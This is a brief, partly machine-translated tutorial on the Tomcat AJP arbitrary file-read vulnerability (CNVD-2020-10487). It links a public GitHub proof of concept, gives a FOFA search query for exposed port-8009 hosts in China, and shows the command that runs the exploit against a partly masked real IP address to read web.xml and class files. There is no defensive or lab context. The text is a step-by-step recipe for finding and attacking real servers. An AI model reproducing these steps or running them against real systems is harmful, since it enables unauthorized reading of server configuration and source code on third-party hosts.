Tomcat AJP protocol Due to implementation defects cause-related parameters controllable, an attacker can exploit the vulnerability by constructing specific parameters, read the server webapps directory any files, but can not cross to the parent directory .
PoC来自GitHub:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
The first step: use FOFA search port 8009
port="8009" && country="CN"
Step 2: Run PoC
python2.7 CNVD-2020-10487-Tomcat-Ajp-lfi.py 151.*.*.114 -p 8009 -f /WEB-INF/web.xml
1. Read web.xml
2. Read * .class file